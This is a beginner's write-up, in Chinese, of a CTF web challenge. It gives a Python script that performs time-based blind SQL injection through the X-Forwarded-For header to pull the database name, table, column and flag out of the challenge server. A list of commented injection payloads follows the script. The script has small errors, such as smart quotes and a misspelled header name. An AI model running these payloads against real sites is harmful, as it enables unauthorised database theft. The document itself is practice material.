根据提示:
我要把攻击我的人都记录db中去!
记录了我们的iP,由此猜测应该是HTTP头注入,获取IP则是通过头中的X-FORWADED-FOR来获取的
相关知识:http://www.cnblogs.com/softidea/p/5325079.html
由此需要写代码来完成相关操作
#!/usr/bin/python
#coding=utf-8
#Author = One
import requests
def request(sql):
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
payload = {
"Host":"ctf5.shiyanbar.com",
"X-FORWARDED-FOR":sql,
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"ccept-Encoding":"gzip, deflate",
"Cookie":"Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1497371533,1499754629; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*80971%2CnickName%3AOne; _ga=GA1.2.1839998664.1499754828; _gid=GA1.2.1200124816.1499754828; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1499764932; PHPSESSID=10gs5psspg8sh6d0unein5uak0",
"Connection":"keep-alive"
}
try:
requests.get(url,headers=payload,timeout=4)
return 0
except:
return 1
def violent(strs):
keys = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY}Z{_"
n = 0
key = ""
for i in range(1,35):
for j in keys:
sql = "127.0.0.1‘ and case when substring(("+strs+") from "+str(i)+" for 1)=‘"+j+"‘ then sleep(5) else 0 end and ‘1‘=‘1"
result = request(sql)
if(result == 1):
key += j
break
else:
n += 1
if(n == 65):
return key
break
else:
n = 0
def main():
#猜解数据库名
dbn_sql = "select database()"
db_name = violent(dbn_sql)
print "数据库名:"+db_name
#猜解数据库中表名
#tbn_sql1 = "select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1"
#print violent(tbn_sql1)
tbn_sql2 = "select table_name from information_schema.tables where table_schema = ‘"+db_name+"‘ order by table_name desc limit 1"
tb_name = violent(tbn_sql2)
print "需要查看的表名:"+tb_name
#猜解表中字段名
cln_sql = "select column_name from information_schema.columns where table_name = ‘"+tb_name+"‘"
col_name = violent(cln_sql)
print "表中的字段名:"+col_name
#猜解记录
key_sql = "select "+col_name+" from "+tb_name
print violent(key_sql)
if __name__ == ‘__main__‘:
main()
#判断数据库长度127.0.0.1‘ and case when length(database())=4 then sleep(5) else 1 end and ‘1‘=‘1
#判断数据库名字127.0.0.1‘ and case when (ascii(substring((select database()) from 1 for 1))&1)=1 then sleep(5) else 1 end and ‘1‘=‘1
#判断数据表数量127.0.0.1‘ and case when (select count(table_name) from information_schema.tables where table_schema = ‘web4‘)=4 then sleep(5) else 1 end and ‘1‘=‘1
#判断数据库表名长度127.0.0.1‘ and case when (select length(table_name) from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1)
#判断数据库表名127.0.0.1‘ and case when (select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1)
#判断表中字段数量127.0.0.1‘ and case when (select count(column_name) from information_schema.columns where table_name = ‘flag‘)
#判断表中字段名长度127.0.0.1‘ and case when (select length(column_name) from information_schema.columns where table_name = ‘flag‘)
#判断表中字段名127.0.0.1‘ and case when (select column_name from information_schema.columns where table_name = ‘flag‘)
#判断记录数量127.0.0.1‘ and case when (select count(flag) from flag)
#判断记录长度127.0.0.1‘ and case when (select length(flag) from flag)
代码写的比较菜...也是看了别人写的一些write up参考的,跑出来的结果要放在ctf{}中,如果不对,多跑几遍
本人也是初学者,有什么错误的地方,希望大家指出,谢谢!
时间: 2024-10-20 18:36:38